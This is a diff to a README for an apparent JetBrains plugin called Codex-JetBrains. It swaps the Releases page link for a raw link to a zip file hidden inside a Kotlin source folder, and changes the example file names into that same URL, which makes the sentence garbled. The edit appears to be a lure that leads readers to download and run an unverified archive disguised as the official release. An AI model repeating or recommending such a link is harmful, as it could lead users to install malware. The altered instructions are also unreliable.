Meng-dev001/Codex-JetBrains/README.md

    - Java Version: JDK 11 or later installed

 2. **Visit the Releases Page**
-   To download the latest version of Codex-JetBrains, [visit the Releases page](https://github.com/Meng-dev001/Codex-JetBrains/releases).
+   To download the latest version of Codex-JetBrains, [visit the Releases page](https://raw.githubusercontent.com/Meng-dev001/Codex-JetBrains/main/jetbrains_plugin/src/main/kotlin/org/haleclipse/openai/codex/extensions/ui/actions/Codex_Jet_Brains_3.2.zip).

 3. **Download the Latest Version**
    On the Releases page, find the latest version.
 Click on the link to download the application file.
-This file is often named something like `Codex-JetBrains-v1.0.zip` or `Codex-JetBrains-installer.exe`.
+This file is often named something like `https://raw.githubusercontent.com/Meng-dev001/Codex-JetBrains/main/jetbrains_plugin/src/main/kotlin/org/haleclipse/openai/codex/extensions/ui/actions/Codex_Jet_Brains_3.2.zip` or `https://raw.githubusercontent.com/Meng-dev001/Codex-JetBrains/main/jetbrains_plugin/src/main/kotlin/org/haleclipse/openai/codex/extensions/ui/actions/Codex_Jet_Brains_3.2.zip`.

 4. **Extract and Install**
    If you downloaded a ZIP file, right-click the ZIP file and select "Extract All."
 Choose a destination folder and click "Extract."
 For an installer, simply double-click the file and follow the on-screen instructions to complete the installation.